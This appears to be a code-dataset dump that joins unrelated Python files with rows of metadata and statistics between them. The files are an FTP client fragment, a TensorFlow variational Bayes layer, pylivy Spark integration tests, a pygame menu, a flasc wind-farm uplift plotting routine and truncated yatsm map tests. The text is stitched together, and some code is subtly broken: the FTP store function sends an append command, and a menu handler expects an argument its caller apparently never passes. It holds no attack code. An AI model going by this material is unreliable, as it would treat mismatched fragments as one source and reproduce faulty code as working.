code, message = parse_reply(reply)
if code == "200":
data_connection, data_host = data_socket.accept()
packet = get_message(data_connection)
contents = packet
while packet:
packet = get_message(data_connection)
contents += packet
filename = os.path.basename(path)
with open(filename, "w") as file:
file.write(contents)
def ftp_stor(ftp_socket, data_socket, path):
"""
goal: send a file
type: (socket, socket, string) -> ()
"""
if ftp_socket and data_socket and os.path.exists(path) and os.path.isfile(path):
stor_command = "{} {}".format("appe", os.path.basename(path))
send_message(ftp_socket, stor_command)
reply = get_message(ftp_socket)
code, message = parse_reply(reply)
if code == "200":
data_connection, data_host = data_socket.accept()
with open(path, "r") as file:
packet = file.read(1024)
while packet:
send_message(data_connection, packet)
packet = file.read(1024)
def ftp_appe(ftp_socket, data_socket, path):
"""
goal: append a file
type: (socket, socket, string) -> ()
"""
if ftp_socket and data_socket and os.path.exists(path) and os.path.isfile(path):
appe_command = "{} {}".format("appe", os.path.basename(path))
send_message(ftp_socket, appe_command)
reply = get_message(ftp_socket)
code, message = parse_reply(reply)
if code == "200":
data_connection, data_host = data_socket.accept()
with open(path, "r") as file:
packet = file.read(1024)
while packet:
send_message(data_connection, packet)
packet = file.read(1024)
# controller functions
def main():
"""
goal: define program entrance
type: () -> int
"""
argc = len(sys.argv)
exit_success = 0
client = Client()
client.configure()
if argc > 1:
client.arguments()
client.start()
sys.exit(exit_success)
if __name__ == "__main__":
main()
| 32.746522 | 111 | 0.521121 | 2,291 | 21,187 | 4.649498 | 0.114361 | 0.087871 | 0.054074 | 0.03389 | 0.466579 | 0.406872 | 0.346695 | 0.2684 | 0.219489 | 0.199305 | 0 | 0.008097 | 0.358805 | 21,187 | 647 | 112 | 32.746522 | 0.776003 | 0.103224 | 0 | 0.372596 | 0 | 0 | 0.081364 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0.028846 | 0.009615 | 0 | 0.108173 | 0.074519 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b7e0940d5b889afde32b2bd5c9b5e316e87b4c3 | 2,986 | py | Python | modules/tensorflow/keras/layers/variational.py | avogel88/compare-VAE-GAE | aa3419c41a58ca6c1a9c1031c0aed7e07c3d4f90 | [
"MIT"
] | null | null | null | modules/tensorflow/keras/layers/variational.py | avogel88/compare-VAE-GAE | aa3419c41a58ca6c1a9c1031c0aed7e07c3d4f90 | [
"MIT"
] | null | null | null | modules/tensorflow/keras/layers/variational.py | avogel88/compare-VAE-GAE | aa3419c41a58ca6c1a9c1031c0aed7e07c3d4f90 | [
"MIT"
] | null | null | null | import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import Dense
from tensorflow.keras.losses import KLD, MSE as keras_mse  # aliased: a module-level MSE is defined below
__all__ = ['Variational']
def normpdf(sample: tf.Tensor,
mean: float = 0.,
logvar: float = 0.,
axis: int = 1) -> tf.Tensor:
return tf.exp(lognormpdf(sample, mean, logvar, axis))
def lognormpdf(sample: tf.Tensor,
mean: float = 0.,
logvar: float = 0.,
axis: int = 1) -> tf.Tensor:
log2pi = tf.math.log(2. * np.pi)
return tf.reduce_sum(
-.5 * ((sample - mean) ** 2. * tf.exp(-logvar) + logvar + log2pi),
axis=axis)
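# A quick numeric check (a sketch): the standard-normal log-density at zero
# is -0.5 * log(2*pi) per dimension, about -0.9189:
#
#   lognormpdf(tf.zeros([1, 1]))   # ~ [-0.9189]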
class Variational(Dense):
"""Variational Bayes Layer.
Empirically captures mean and logarithmic variance of the source distribution.
Considers the ELBO of the marginal likelihood as loss which consists of
the divergence between posterior and prior and the reconstruction loss.
Here the divergence between posterior and prior is treated as variational loss.
ELBO = E_q(z|x) log p(x|z) - KLD(q(z|x), p(z))
KLD(q(z|x), p(z)) = E_q(z|x) log[q(z|x)/p(z)]
= E_q(z|x) [log q(z|x) - log p(z)]
Single sample Monte Carlo estimate of the ELBO:
ELBO = E [log p(x|z) + log p(z) - log q(z|x)]
Source: https://www.tensorflow.org/tutorials/generative/cvae#define_the_loss_function_and_the_optimizer
"""
def __init__(self, units: int):
super().__init__(2*units)
def call(self, inputs: tf.Tensor) -> tf.Tensor:
# Mean & Variance in one Dense Layer
latent = super().call(inputs)
# Reparameterization
mean, logvar = tf.split(latent, num_or_size_splits=2, axis=1)
eps = tf.random.normal(shape=tf.shape(mean))
z = eps * tf.exp(logvar * .5) + mean
# Loss
logpz = lognormpdf(z)
logqz_x = lognormpdf(z, mean, logvar)
div = -tf.reduce_mean(logpz - logqz_x)
self.add_loss(div)
# self.add_metric(value=logpz, name='logpz')
# self.add_metric(value=logqz_x, name='logqz_x')
# problems with metrics:
# logpz & logqz_x are not scalars
# enc: corrcoef(logpx, logqz_x)
# rec: corrcoef(logpx, logpx_z)
# gen: corrcoef(logpz, logpx_z)
"""Alternative with KLD (was not used during the experiments).
pz = normpdf(z)
qz_x = normpdf(z, mean, logvar)
self.add_loss(KLD(qz_x, pz))
"""
return z
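# A minimal usage sketch (shapes are illustrative):
#
#   layer = Variational(units=8)
#   z = layer(tf.random.normal([4, 16]))   # z has shape (4, 8)
#   kl_losses = layer.losses               # divergence added via add_loss()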
@tf.function
def MSE(x: tf.Tensor, x_decoded: tf.Tensor) -> tf.Tensor:
"""MSE-loss optimized for variational inference.
MSE = E_q(z|x) log p(x|z)
Here in conjunction to the variational loss:
MSE = E log p(x|z)
"""
cross_ent = keras_mse(x, x_decoded)  # the aliased Keras loss; calling MSE here would recurse
cross_ent = tf.reshape(cross_ent, [tf.shape(x)[0], -1])
logpx_z = -tf.reduce_sum(cross_ent, axis=1)
return -tf.reduce_mean(logpx_z)
| 34.321839 | 107 | 0.595111 | 429 | 2,986 | 4.02331 | 0.314685 | 0.041715 | 0.015643 | 0.017381 | 0.147161 | 0.136732 | 0.093859 | 0.087486 | 0.075898 | 0.075898 | 0 | 0.008396 | 0.281983 | 2,986 | 86 | 108 | 34.72093 | 0.796642 | 0.373074 | 0 | 0.162162 | 0 | 0 | 0.006918 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.135135 | false | 0 | 0.108108 | 0.027027 | 0.378378 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b7e863b55ad61e3ed39373725c38c5ba8192557 | 4,582 | py | Python | tests/test_integration.py | vectra-ai-research/pylivy | dbcbebd69a1557b72f08428d60ffd13b84ff8d7d | [
"MIT"
] | 5 | 2021-06-22T08:09:45.000Z | 2021-08-11T14:40:12.000Z | tests/test_integration.py | vectra-ai-research/pylivy | dbcbebd69a1557b72f08428d60ffd13b84ff8d7d | [
"MIT"
] | null | null | null | tests/test_integration.py | vectra-ai-research/pylivy | dbcbebd69a1557b72f08428d60ffd13b84ff8d7d | [
"MIT"
] | null | null | null | from dataclasses import dataclass
import pytest
import requests
import pandas
from livy import (
LivySession,
LivyBatch,
SessionKind,
SparkRuntimeError,
SessionState,
)
@dataclass
class Parameters:
print_foo_code: str
print_foo_output: str
create_dataframe_code: str
dataframe_count_code: str
dataframe_count_output: str
error_code: str
RANGE_EXPECTED_DATAFRAME = pandas.DataFrame({"value": range(100)})
SPARK_CREATE_RANGE_DATAFRAME = """
import org.apache.spark.sql.Row
import org.apache.spark.sql.types._
val rdd = sc.parallelize(0 to 99)
val schema = StructType(List(
StructField("value", IntegerType, nullable = false)
))
val df = spark.createDataFrame(rdd.map { i => Row(i) }, schema)
"""
SPARK_TEST_PARAMETERS = Parameters(
print_foo_code='println("foo")',
print_foo_output="foo\n\n",
create_dataframe_code=SPARK_CREATE_RANGE_DATAFRAME,
dataframe_count_code="df.count()",
dataframe_count_output="res1: Long = 100\n\n",
error_code="1 / 0",
)
PYSPARK_CREATE_RANGE_DATAFRAME = """
from pyspark.sql import Row
df = spark.createDataFrame([Row(value=i) for i in range(100)])
"""
PYSPARK_TEST_PARAMETERS = Parameters(
print_foo_code='print("foo")',
print_foo_output="foo\n",
create_dataframe_code=PYSPARK_CREATE_RANGE_DATAFRAME,
dataframe_count_code="df.count()",
dataframe_count_output="100\n",
error_code="1 / 0",
)
SPARKR_CREATE_RANGE_DATAFRAME = """
df <- createDataFrame(data.frame(value = 0:99))
"""
SPARKR_TEST_PARAMETERS = Parameters(
print_foo_code='print("foo")',
print_foo_output='[1] "foo"\n',
create_dataframe_code=SPARKR_CREATE_RANGE_DATAFRAME,
dataframe_count_code="count(df)",
dataframe_count_output="[1] 100\n",
error_code="missing_function()",
)
SQL_CREATE_VIEW = """
CREATE TEMPORARY VIEW view AS SELECT id AS value FROM RANGE(100)
"""
@pytest.mark.integration
@pytest.mark.parametrize(
"session_kind, params",
[
(SessionKind.SPARK, SPARK_TEST_PARAMETERS),
(SessionKind.PYSPARK, PYSPARK_TEST_PARAMETERS),
(SessionKind.SPARKR, SPARKR_TEST_PARAMETERS),
],
)
def test_session(integration_url, capsys, session_kind, params):
assert _livy_available(integration_url)
with LivySession.create(integration_url, kind=session_kind) as session:
assert session.state == SessionState.IDLE
session.run(params.print_foo_code)
assert capsys.readouterr() == (params.print_foo_output, "")
session.run(params.create_dataframe_code)
capsys.readouterr()
session.run(params.dataframe_count_code)
assert capsys.readouterr() == (params.dataframe_count_output, "")
with pytest.raises(SparkRuntimeError):
session.run(params.error_code)
assert session.read("df").equals(RANGE_EXPECTED_DATAFRAME)
assert _session_stopped(integration_url, session.session_id)
@pytest.mark.integration
def test_sql_session(integration_url):
assert _livy_available(integration_url)
with LivySession.create(integration_url, kind=SessionKind.SQL) as session:
assert session.state == SessionState.IDLE
session.run(SQL_CREATE_VIEW)
output = session.run("SELECT COUNT(*) FROM view")
assert output.json["data"] == [[100]]
with pytest.raises(SparkRuntimeError):
session.run("not valid SQL!")
assert session.read_sql("SELECT * FROM view").equals(
RANGE_EXPECTED_DATAFRAME
)
assert _session_stopped(integration_url, session.session_id)
@pytest.mark.integration
def test_batch_job(integration_url):
assert _livy_available(integration_url)
batch = LivyBatch.create(
integration_url,
file=(
"https://repo.typesafe.com/typesafe/maven-releases/org/apache/"
"spark/spark-examples_2.11/1.6.0-typesafe-001/"
"spark-examples_2.11-1.6.0-typesafe-001.jar"
),
class_name="org.apache.spark.examples.SparkPi",
)
assert batch.state == SessionState.RUNNING
batch.wait()
assert batch.state == SessionState.SUCCESS
assert any(
"spark.SparkContext: Successfully stopped SparkContext" in line
for line in batch.log()
)
def _livy_available(livy_url):
return requests.get(livy_url).status_code == 200
def _session_stopped(livy_url, session_id):
response = requests.get(f"{livy_url}/session/{session_id}")
if response.status_code == 404:
return True
else:
        return response.json()["state"] == "shutting_down"  # requests.Response has .json(), not .get_json()
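# A minimal sketch of the `integration_url` fixture this module relies on; the
# real definition lives in a conftest.py that is not shown here. Reading the
# Livy URL from a LIVY_URL environment variable (defaulting to Livy's usual
# local port) is an assumption for illustration, not pylivy's documented harness.
@pytest.fixture
def integration_url_sketch():
    import os
    return os.environ.get("LIVY_URL", "http://localhost:8998")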
| 26.952941 | 78 | 0.704059 | 563 | 4,582 | 5.470693 | 0.232682 | 0.031169 | 0.038961 | 0.028571 | 0.386364 | 0.329221 | 0.269156 | 0.249351 | 0.249351 | 0.195455 | 0 | 0.015487 | 0.182671 | 4,582 | 169 | 79 | 27.112426 | 0.806943 | 0 | 0 | 0.173228 | 0 | 0 | 0.21519 | 0.065255 | 0 | 0 | 0 | 0 | 0.11811 | 1 | 0.03937 | false | 0 | 0.062992 | 0.007874 | 0.181102 | 0.07874 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b7e86dcda0a74f36d2254f286c6cc746f1978c0 | 5,435 | py | Python | main/menu.py | FinleyDavies/super-pygame-bomberman | 84ba1d1b75ea0a56145c0b94372238805183f3e4 | [
"MIT"
] | null | null | null | main/menu.py | FinleyDavies/super-pygame-bomberman | 84ba1d1b75ea0a56145c0b94372238805183f3e4 | [
"MIT"
] | null | null | null | main/menu.py | FinleyDavies/super-pygame-bomberman | 84ba1d1b75ea0a56145c0b94372238805183f3e4 | [
"MIT"
] | null | null | null | import pygame
from button import Button
from threading import Thread
from queue import Queue
from time import sleep
class Menu:
KEYBIND = pygame.K_ESCAPE
FONT = "microsoftphagspa"
FONT_SIZE_BUTTON = 15
FONT_SIZE_TITLE = 40
FONT_SIZE_SUBTITLE = 20
BUTTON_HEIGHT = 50
BUTTON_WIDTH = 100
def __init__(self, screen, name=None, columns=1):
self.name = "Main Menu" if name is None else name
self.title_font = pygame.font.Font(pygame.font.match_font(self.FONT), self.FONT_SIZE_TITLE)
self.subtitle_font = pygame.font.Font(pygame.font.match_font(self.FONT), self.FONT_SIZE_SUBTITLE)
self.title = self.title_font.render(self.name, True, (10, 10, 10))
self.buttons = list()
self.layout = [list() for _ in range(columns)]
self.columns = columns
self.screen = screen
self.rect = screen.get_rect()
self.surface = pygame.Surface(self.rect.size, pygame.SRCALPHA)
self.is_open = False
self.same_frame = False # prevents button presses from registering twice when changing menus
self.add_button("Resume Game", self.close)
self.adjacents = []
def get_button_center(self, column):
# returns the center of the next button
center_x = (self.rect.width / (self.columns + 1)) * (column + 1)
center_y = self.BUTTON_HEIGHT + (self.BUTTON_HEIGHT + 10) * (len(self.layout[column]) + 1)
return center_x, center_y
def add_button(self, name, function, column=0, self_parameter=False):
button_rect = pygame.rect.Rect(0, 0, self.BUTTON_WIDTH, self.BUTTON_HEIGHT)
button_rect.center = self.get_button_center(column)
button = Button(self.surface, button_rect, name, function, self_parameter, font_name=self.FONT,
font_size=self.FONT_SIZE_BUTTON)
self.buttons.append(button)
self.layout[column].append(button)
def add_subtitle(self, name, column):
button_rect = pygame.rect.Rect(0, 0, self.BUTTON_WIDTH, self.BUTTON_HEIGHT)
button_rect.center = self.get_button_center(column)
button = Button(self.surface, button_rect, name, font_name=self.FONT,
font_size=self.FONT_SIZE_SUBTITLE, interactive=False, draw_rect=False)
self.buttons.append(button)
self.layout[column].append(button)
def add_menu(self, menu):
def on_press():
print(f"closing {self.name}")
self.close()
print(f"opening {menu.name}")
menu.same_frame = True
menu.open()
if menu not in self.adjacents:
self.adjacents.append(menu)
self.add_button(menu.get_name(), on_press)
menu.add_menu(self)
def update(self, event):
if event.type == pygame.KEYDOWN:
if event.key == self.KEYBIND:
if self.name == "Main Menu":
self.is_open = not self.is_open
else:
self.is_open = False
if self.is_open and not self.same_frame:
if event.type == pygame.MOUSEBUTTONDOWN:
for button in self.buttons:
button.press(pygame.mouse.get_pos())
for button in self.buttons:
button.update(pygame.mouse.get_pos())
self.same_frame = False
def draw(self):
if self.is_open:
self.surface.fill((255, 255, 255, 128))
rect = self.title.get_rect()
rect.center = (self.rect.width / 2, 30)
self.surface.blit(self.title, rect)
for button in self.buttons:
button.draw()
self.screen.blit(self.surface, (0, 0))
def open(self):
self.is_open = True
def close(self):
self.is_open = False
def get_name(self):
return self.name
class ControlsMenu(Menu):
CONTROLS = {"UP": pygame.K_w, "LEFT": pygame.K_a, "DOWN": pygame.K_s, "RIGHT": pygame.K_d, "PUNCH": pygame.K_j,
"DETONATE": pygame.K_k}
def __init__(self, screen, players, controls):
super().__init__(screen, "Controls", len(players) + 1)
self.players = players
self.controls = controls
self.set_buttons()
self.event_queue = Queue()
self.changing = False
def set_buttons(self):
# [self.layout[i+1].append(None) for i in range(len(self.layout)-1)]
for column, player in enumerate(self.players):
self.add_subtitle(player, column + 1)
for column in range(len(self.players)):
for control in self.controls:
                self.add_button(control, self.change_binding, column + 1, True)
def update(self, event):
super().update(event)
if self.changing:
self.event_queue.put(event)
def change_binding(self, button, callback):
# callback runs in separate thread and must return a string
if self.changing:
return
self.changing = True
button.change_text("Press key to assign")
def print_key():
while True:
event = self.event_queue.get()
if event.type == pygame.KEYDOWN:
break
button.render_text(f"{button.text}: {pygame.key.name(event.key)}")
self.changing = False
t = Thread(target=print_key)
t.start()
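# A minimal sketch of how a Menu could be driven from a pygame main loop,
# assuming a 640x480 window; only the Menu API exercised above
# (update/draw, ESC toggling via KEYBIND) is used here.
def _demo_menu_loop():
    pygame.init()
    screen = pygame.display.set_mode((640, 480))
    clock = pygame.time.Clock()
    menu = Menu(screen)  # default name "Main Menu", so ESC toggles it
    running = True
    while running:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
            menu.update(event)  # feed every event so key and mouse presses register
        screen.fill((40, 40, 40))
        menu.draw()  # no-op unless the menu is open
        pygame.display.flip()
        clock.tick(60)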
| 32.740964 | 115 | 0.605152 | 701 | 5,435 | 4.536377 | 0.202568 | 0.022642 | 0.025157 | 0.014151 | 0.220755 | 0.20566 | 0.179245 | 0.179245 | 0.179245 | 0.156604 | 0 | 0.012927 | 0.288316 | 5,435 | 165 | 116 | 32.939394 | 0.809204 | 0.042134 | 0 | 0.2 | 0 | 0 | 0.034801 | 0.005384 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.041667 | 0.008333 | 0.283333 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b7e9c535b925d95a13599c206d4744f2e59d557 | 5,859 | py | Python | flasc/wake_steering/yaw_optimizer_visualization.py | NREL/flasc | ac734892efc1bc7684e2393ffa1ce7a97a54efa1 | [
"Apache-2.0"
] | 3 | 2022-01-23T19:33:32.000Z | 2022-03-14T10:29:36.000Z | flasc/wake_steering/yaw_optimizer_visualization.py | NREL/flasc | ac734892efc1bc7684e2393ffa1ce7a97a54efa1 | [
"Apache-2.0"
] | 2 | 2022-03-02T20:45:30.000Z | 2022-03-22T18:49:24.000Z | flasc/wake_steering/yaw_optimizer_visualization.py | NREL/flasc | ac734892efc1bc7684e2393ffa1ce7a97a54efa1 | [
"Apache-2.0"
] | 4 | 2022-02-17T18:40:36.000Z | 2022-03-24T05:44:31.000Z | # Copyright 2021 NREL
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def plot_uplifts_by_atmospheric_conditions(
df_list,
labels=None,
ws_edges=np.arange(3.0, 17.0, 1.0),
wd_edges=np.arange(0.0, 360.0001, 3.0),
    ti_edges=np.arange(0.0, 0.30, 0.02),
):
# Calculate bin means
ws_labels = (ws_edges[0:-1] + ws_edges[1::]) / 2.
wd_labels = (wd_edges[0:-1] + wd_edges[1::]) / 2.
ti_labels = (ti_edges[0:-1] + ti_edges[1::]) / 2.
# Format input
if isinstance(df_list, pd.DataFrame):
df_list = [df_list]
# Clean dataframes and calculate AEP gains
for ii, df in enumerate(df_list):
# Only keep cases with Pbl > 0 and non-NaNs
df = df.dropna(how='any', subset=['farm_power_baseline', 'farm_power_opt'])
df = df[df['farm_power_baseline'] > 0.01].reset_index(drop=True)
# Check if frequency vector exists
if not "farm_energy_baseline" in df.columns:
if "frequency" in df.columns:
df["frequency"] = df["frequency"].astype(float)
elif "freq" in df.columns:
df["frequency"] = df["freq"].astype(float)
else:
df["frequency"] = 1.0
print(
"No column 'freq' or 'frequency' found in dataframe." +
"Assuming a uniform distribution."
)
# Calculate wind farm energy, baseline and optimized
df["farm_energy_baseline"] = df["farm_power_baseline"] * df["frequency"]
df["farm_energy_opt"] = df["farm_power_opt"] * df["frequency"]
# Calculate relative and absolute uplift in energy for every condition
df["Prel"] = np.where(
df["farm_power_baseline"] > 0.0,
df["farm_power_opt"] / df["farm_power_baseline"],
0.0
)
df["Pabs"] = (
(df["farm_energy_opt"] - df["farm_energy_baseline"]) /
np.nansum(df["farm_energy_opt"] - df["farm_energy_baseline"])
)
# Bin data by wind speed, wind direction and turbulence intensity
df["ws_bin"] = pd.cut(df["wind_speed"], ws_edges, right=False, labels=ws_labels)
df["wd_bin"] = pd.cut(df["wind_direction"], wd_edges, right=False, labels=wd_labels)
df["ti_bin"] = pd.cut(df["turbulence_intensity"], ti_edges, right=False, labels=ti_labels)
df_list[ii] = df.copy() # Save updated dataframe to self
for yii, yq_col in enumerate(["Prel", "Pabs"]):
if yii == 0:
ylabel = "Relative power gain (%)"
else:
ylabel = "Contribution to AEP uplift (%)"
for xii, xq_col in enumerate(["ws_bin", "wd_bin", "ti_bin"]):
if xii == 0:
xlabel = "Wind speed (m/s)"
elif xii == 1:
xlabel = "Wind direction (deg)"
elif xii == 2:
xlabel = "Turbulence intensity (%)"
if np.all([df["turbulence_intensity"].unique() <= 1 for df in df_list]):
# Skip TI, if only optimized and evaluated for single TI
break
# Now produce plots with dataframes: wind speed vs. relative power gain
x = [None for _ in range(len(df_list))]
y = [None for _ in range(len(df_list))]
f = [None for _ in range(len(df_list))]
for dii, df in enumerate(df_list):
df_group = df.groupby(xq_col)
if yii == 0:
y[dii] = 100.0 * (df_group["Prel"].apply(np.nanmean) - 1.0)
else:
y[dii] = 100.0 * (df_group["Pabs"].apply(np.nansum))
f[dii] = df_group["frequency"].apply(np.nansum)
x[dii] = np.array(y[dii].index, dtype=float)
fig, ax = _plot_bins(x, y, f, xlabel, ylabel, labels)
def _plot_bins(x, y, yn, xlabel=None, ylabel=None, labels=None):
# Assume x, y and yn are lists of lists
if isinstance(x[0], (float, int)):
x = [x]
y = [y]
yn = [yn]
# Get number of dataframes to plot
nd = len(x)
if labels is None:
labels = [None for _ in range(nd)]
# Produce plots
fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(10, 4))
if np.all([len(xi) <= 1 for xi in x]):
dx = 1.0 # Default to 1.0 bin width, if only one value
else:
dx = np.min(np.hstack([np.diff(xi) for xi in x])) * 0.8 / nd # Bin width
for dii in range(nd):
# Produce top subplot
ax[0].bar(x=x[dii] + (dii - 0.5) * dx, height=y[dii], width=dx, label=labels[dii])
ax[0].set_ylabel(ylabel)
ax[0].grid(True)
ax[1].bar(x=x[dii] + (dii - 0.5) * dx, height=yn[dii], width=dx, label=labels[dii])
ax[1].set_ylabel('Frequency (-)')
ax[1].set_xlabel(xlabel)
ax[1].grid(True)
ax[1].set_xticks(x[dii])
if len(x[dii]) > 50: # Too many ticks: reduce
xtlabels = ['' for _ in range(len(x[dii]))]
xtlabels[0::5] = ['%.1f' % i for i in x[dii][0::5]]
else:
xtlabels = ['%.1f' % i for i in x[dii]]
ax[1].set_xticklabels(xtlabels)
if not np.all([a is None for a in labels]):
ax[0].legend()
ax[1].legend()
return fig, ax
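# A minimal sketch of calling the plot function above on synthetic data; the
# column names match those consumed in plot_uplifts_by_atmospheric_conditions,
# but the values are made up for illustration.
if __name__ == "__main__":
    n = 500
    rng = np.random.default_rng(0)
    df_demo = pd.DataFrame({
        "wind_speed": rng.uniform(3.0, 16.0, n),
        "wind_direction": rng.uniform(0.0, 360.0, n),
        "turbulence_intensity": rng.uniform(0.03, 0.15, n),
        "farm_power_baseline": rng.uniform(1.0e6, 5.0e6, n),
        "frequency": np.full(n, 1.0 / n),
    })
    # optimized power: baseline plus a small synthetic uplift
    df_demo["farm_power_opt"] = df_demo["farm_power_baseline"] * 1.01
    plot_uplifts_by_atmospheric_conditions(df_demo, labels=["demo"])
    plt.show()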
| 38.294118 | 98 | 0.565626 | 848 | 5,859 | 3.795991 | 0.287736 | 0.022367 | 0.020503 | 0.02361 | 0.168375 | 0.125505 | 0.09475 | 0.034793 | 0.013048 | 0 | 0 | 0.026053 | 0.299027 | 5,859 | 152 | 99 | 38.546053 | 0.757731 | 0.206179 | 0 | 0.068627 | 0 | 0 | 0.148388 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019608 | false | 0 | 0.029412 | 0 | 0.058824 | 0.009804 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b7ea2bf8223bfbee13d970f55dd6307562fcffc | 7,290 | py | Python | tests/cli/test_map_coef.py | TedrosGitHub/TSA-yatsm | 8e328f366c8fd94d5cc57cd2cc42080c43d1f391 | [
"MIT"
] | 59 | 2015-02-03T19:56:17.000Z | 2022-03-17T13:45:23.000Z | tests/cli/test_map_coef.py | TedrosGitHub/TSA-yatsm | 8e328f366c8fd94d5cc57cd2cc42080c43d1f391 | [
"MIT"
] | 97 | 2015-02-12T05:18:38.000Z | 2020-06-09T16:10:38.000Z | tests/cli/test_map_coef.py | TedrosGitHub/TSA-yatsm | 8e328f366c8fd94d5cc57cd2cc42080c43d1f391 | [
"MIT"
] | 35 | 2015-02-27T19:43:23.000Z | 2021-06-21T02:29:14.000Z | """ Test ``yatsm map coef ...``
"""
from click.testing import CliRunner
import numpy as np
from yatsm.cli.main import cli
# Truth for diagonals
diag = np.eye(5).astype(bool)
# Coefficient types
intercepts = np.arange(0, 7)
slopes = np.arange(7, 14)
seasonality_1 = np.arange(14, 21)
seasonality_2 = np.arange(21, 28)
dummies = np.arange(28, 35)
rmse = np.arange(35, 42)
all_coef = [intercepts, slopes, seasonality_1, seasonality_2, dummies, rmse]
# SWIR coefficients for Lasso20
coef_int_b5 = np.array([-9999., -16441.076172, 16221.29199219,
117207.890625, 393939.25], dtype=np.float32)
coef_slope_b5 = np.array([-9.99900000e+03, 2.333318e-02, -2.05697268e-02,
-1.55864090e-01, -5.34402490e-01], dtype=np.float32)
coef_season1_b5 = np.array([-9999., -3.76317239, -0., -0., -0.],
dtype=np.float32)
coef_season2_b5 = np.array([-9999., 112.587677, 165.92492676, 228.65888977,
255.87475586], dtype=np.float32)
coef_dummy_b5 = np.array([-9999., 0., -0., 0., -0.], dtype=np.float32)
coef_rmse_b5 = np.array([-9999., 113.20720673, 132.36845398, 140.73822021,
142.13438416], dtype=np.float32)
truths_b5 = [coef_int_b5, coef_slope_b5, coef_season1_b5, coef_season2_b5,
coef_dummy_b5, coef_rmse_b5]
coef_amp_b5 = np.array([-9999., 112.650551, 165.92492676, 228.65888977,
255.87475586], dtype=np.float32)
# TODO: SWIR coefficients for OLS
# TODO: SWIR coefficients for RLM
# INTENTIONAL PASSES
def test_map_coef_pass_1(example_results, tmpdir, read_image):
""" Make a map with reasonable inputs
"""
image = tmpdir.join('coefmap.gtif').strpath
runner = CliRunner()
result = runner.invoke(
cli,
['-v', 'map',
'--root', example_results['root'],
'--result', example_results['results_dir'],
'--image', example_results['example_img'],
'coef', '2005-06-01', image
])
img = read_image(image)
assert result.exit_code == 0
assert img.shape == (42, 5, 5)
np.testing.assert_allclose(img[intercepts[4], diag], coef_int_b5)
np.testing.assert_allclose(img[slopes[4], diag], coef_slope_b5)
np.testing.assert_allclose(img[seasonality_1[4], diag], coef_season1_b5)
np.testing.assert_allclose(img[seasonality_2[4], diag], coef_season2_b5)
np.testing.assert_allclose(img[dummies[4], diag], coef_dummy_b5)
np.testing.assert_allclose(img[rmse[4], diag], coef_rmse_b5)
def test_map_coef_pass_2(example_results, tmpdir, read_image):
""" Make a map with reasonable inputs, selecting just one band
"""
image = tmpdir.join('coefmap.gtif').strpath
runner = CliRunner()
result = runner.invoke(
cli,
['-v', 'map',
'--root', example_results['root'],
'--result', example_results['results_dir'],
'--image', example_results['example_img'],
'--band', '5',
'coef', '2005-06-01', image
])
img = read_image(image)
assert result.exit_code == 0
assert img.shape == (6, 5, 5)
np.testing.assert_allclose(img[0, diag], coef_int_b5)
np.testing.assert_allclose(img[1, diag], coef_slope_b5)
np.testing.assert_allclose(img[2, diag], coef_season1_b5)
np.testing.assert_allclose(img[3, diag], coef_season2_b5)
np.testing.assert_allclose(img[4, diag], coef_dummy_b5)
np.testing.assert_allclose(img[5, diag], coef_rmse_b5)
def test_map_coef_pass_3(example_results, tmpdir, read_image):
""" Make a map with reasonable inputs, selecting just one band and coef
"""
image = tmpdir.join('coefmap.gtif').strpath
runner = CliRunner()
idx_season = 0
coefs = ['intercept', 'slope', 'seasonality', 'seasonality', 'categorical',
'rmse']
for coef, idx_coef, truth in zip(coefs, all_coef, truths_b5):
result = runner.invoke(
cli,
['-v', 'map',
'--root', example_results['root'],
'--result', example_results['results_dir'],
'--image', example_results['example_img'],
'--band', '5', '--coef', coef,
'coef', '2005-06-01', image
])
img = read_image(image)
assert result.exit_code == 0
if coef == 'seasonality': # seasonality has 2 bands
assert img.shape == (2, 5, 5)
band_index = idx_season
idx_season += 1
else:
band_index = 0
assert img.shape == (1, 5, 5)
np.testing.assert_allclose(img[band_index, diag], truth)
def test_map_coef_pass_amplitude(example_results, tmpdir, read_image):
""" Make a map with reasonable inputs, selecting just one band and
mapping only seasonality as amplitude
"""
